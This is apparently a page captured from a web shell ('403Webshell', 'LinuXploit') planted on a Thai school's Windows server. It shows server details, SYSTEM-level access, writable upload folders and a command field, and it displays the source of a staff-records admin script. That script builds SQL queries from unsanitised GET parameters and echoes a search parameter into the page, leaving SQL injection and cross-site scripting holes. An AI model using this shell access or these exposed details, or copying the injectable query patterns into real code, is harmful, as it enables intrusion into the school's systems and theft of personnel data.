403Webshell
Server IP : 104.21.80.248  /  Your IP : 172.71.28.156
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Inetpub/www/myschool/kururat/modules/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /Inetpub/www/myschool/kururat/modules/admin/editschool.php
<link href="style_web.css" rel="stylesheet" type="text/css">
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_jumpMenu(targ,selObj,restore){ //v3.0
  eval(targ+".location='"+selObj.options[selObj.selectedIndex].value+"'");
  if (restore) selObj.selectedIndex=0;
}
//-->
</script>
<form name="form3" method="post" action="?name=admin&file=tabainkru">
  <table width=100%  border="0" align="right" cellpadding="0" cellspacing="0">
    <tr class="unnamed1">
		<td width="60%" class="unnamed2">
		</td>
		<td width="20%" class="unnamed2">
			<div align="right">
			<img src="images/admin/search.jpg" alt="s" width="19" height="18"><strong>ระบุเงื่อนไข</strong>
			</div>
		</td>
		<td width="15%">
			<label>
			</label>
				<input name="search" type="text" id="search" value="<?=$_GET["search"];?>">
		</td>
      <td width="5%">
        <div align="left">
          <input type="submit" name="Submit2" value="ค้นหา">
        </div></td>
    </tr>
  </table>
  </form>
<link href="style_web.css" rel="stylesheet" type="text/css">
	<TABLE cellSpacing=0 cellPadding=0 width=100% height=400 align="center"border=0>
      <TBODY>
        <TR>
<BR><div align="left"><b><img src="images/admin/admins.gif"  border="0" align="absmiddle" /> <a href="?name=admin&amp;file=reportschool">หน้าโรงเรียน</a>
			<a href="?name=admin&amp;file=user_schoolkru&amp;op=user_add&id=<?=$arr[usersch][id];?>"><img src="images/admin/user.gif"  border="0" align="absmiddle" /> เพิ่มผู้ใช้ใหม่</a>
<?
$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
//////////////////////////////////////////// กรณีเพิ่ม User Admin Form
if(((($_SESSION['admin_user']) OR ($_SESSION['user_user']) OR ($_SESSION['usersch_user'])))){

if($_GET[sangkad]){
	$SQLwhere = " sangkad='".$_GET[sangkad]."' ";
	$SQLwhere4 = " WHERE sangkad='".$_GET[sangkad]."' ";
}

$res[user] = $db->select_query("SELECT * FROM ".TB_user." $SQLwhere4  ORDER BY id DESC LIMIT 1 ");
while ($arr[user] = $db->fetch($res[user])){

$res[usersch] = $db->select_query("SELECT * FROM ".TB_usersch." WHERE id='".$arr[user][sangkad]."' ");
$arr[usersch] = $db->fetch($res[usersch]);
?>		
&nbsp;&nbsp;&nbsp;<a href="?name=admin&file=adeet&sangkad=<?=$arr[usersch][id];?>"><img src="images/admin/user.gif"  border="0" align="absmiddle" /> จัดการบุคลากรในอดีต</a></div></b>
<TD  align="center" vAlign=top></a>&nbsp;&nbsp;&nbsp;	<FONT COLOR=blue><b>ทะเบียนบุคลากรของโรงเรียน<?=$arr[usersch][name];?> </FONT>
  <table width="100%" cellspacing="2" cellpadding="1" >
											<tr bgcolor="#99ccff" height="25">
                                                <td align="center"><b>ที่</b></td>
                                                <td align="center">ชื่อผู้ใข้</td>
                                                <td align="center">ชื่อ - นามสกุล</td>
                                                <td align="center">ตำแหน่ง</td>
												<td align="center">แก้ไข</font></div></td>
												<td align="center">ลายเซ็น</td>
												<td align="center">จัดการ</font></div></td>
												<td align="center">การใช้</font></div></td>
                                          </tr>
<?
//	CheckUser($_SESSION['user_user']);
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
		$res[usersch] = $db->select_query("SELECT * FROM ".TB_usersch." WHERE username='".$_SESSION['usersch_user']."' ");
		$arr[usersch] = $db->fetch($res[usersch]);
//แสดงบทความ
if($_GET[sangkad]){
	$SQLwhere = " sangkad='".$_GET[sangkad]."' ";
	$SQLwhere2 = " WHERE sangkad='".$_GET[sangkad]."' ";
}
	$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
$limit = 20 ;
$SUMPAGE = $db->num_rows(TB_user,"id","$SQLwhere");
$page=$_GET[page];
if (empty($page)){
	$page=1;
}
$rt = $SUMPAGE%$limit ;
$totalpage = ($rt!=0) ? floor($SUMPAGE/$limit)+1 : floor($SUMPAGE/$limit); 
$goto = ($page-1)*$limit ;
$res[user] = $db->select_query("SELECT * FROM ".TB_user." $SQLwhere2 AND status between  4 and 5 ORDER BY status ASC LIMIT $goto, $limit   ");
$count=0;
$i=1;
while($arr[user] = $db->fetch($res[user]))
	{
$res[usersch] = $db->select_query("SELECT * FROM ".TB_usersch." WHERE id='".$arr[user][sangkad]."' ");
$arr[usersch] = $db->fetch($res[usersch]);
	 if ($i%2==0) 
{
	?><tr bgcolor="#C9FBC8" class="unnamed1"><?
} else {
	?><tr bgcolor="#E6FE99" class="unnamed2"><?
} ?>

	<td  width="5%"  align="center"><? echo"".$i?></td>
   <td width="10%"  ><?echo $arr[user][username];?></td>
   <td width="20%"  ><?echo $arr[user][category_name];?></td>
	<td  width="25%"><?echo $arr[user][posit];?><?echo $arr[user][school];?></td>
	<td width="5%" align="center">
	<a href="?name=admin&amp;file=user_schoolkru&amp;op=minepass_edit&amp;id=<? echo $arr[user][id];?>"><font color="#FF0000"><img src="images/icon/edit.gif" border="0" alt="แก้ไข" /></font></a> </td>
	<td width="20%" align="center"><img src="laysen/<? echo $arr[user][id];?>.jpg" alt="Not Found!"  border="0"></td>

	<td width="10%" align="center">
	<a href="javascript:NewWindow('popup2.php?name=admin&file=signature2&showedit=<? echo $arr[user][id];?>','acepopup','500','400','center','front');"><font color="#FF0000">ลายเซ็น</font></a> </td>
	<td width="10%" align="center"><A HREF="?name=admin&file=usersch_schoolout&op=minepass_edit&id=<?=$arr[user][id];?> ">เปิด</a></td>
  </tr>  

	<?
$count++;
$i++;
if (($count%1) == 0) { echo ""; $count=0; }
}
$db->closedb ();
//จบการแสดงข่าวสาร
?> 
				</table>

 </form>		
 </TD>
 </TR>
 </TABLE>

				<BR>
				<table border="0" cellpadding="0" cellspacing="1" width="100%" align=center>
					<tr>
						<td>
	
				<?
			$pages = new Paginator;
			$pages->items_total = $Num_Rows;
			$pages->mid_range = 10;
			$pages->current_page = $Page;
			$pages->default_ipp = $Per_Page;
				SplitPage($page,$totalpage,"?name=admin&op=approvalkru_read&file=editschool&sangkad=".$_GET[sangkad]."");
				echo $ShowSumPages ;
				echo "<BR>";
				echo $ShowPages ;
				?> 
					</TD>
				</TR>
			</TABLE>
	<?
}
 ?><? }  ?>		<!-- Admin -->
		  </TD>
        </TR>
      </TBODY>
    </TABLE>

Youez - 2016 - github.com/yon3zu
LinuXploit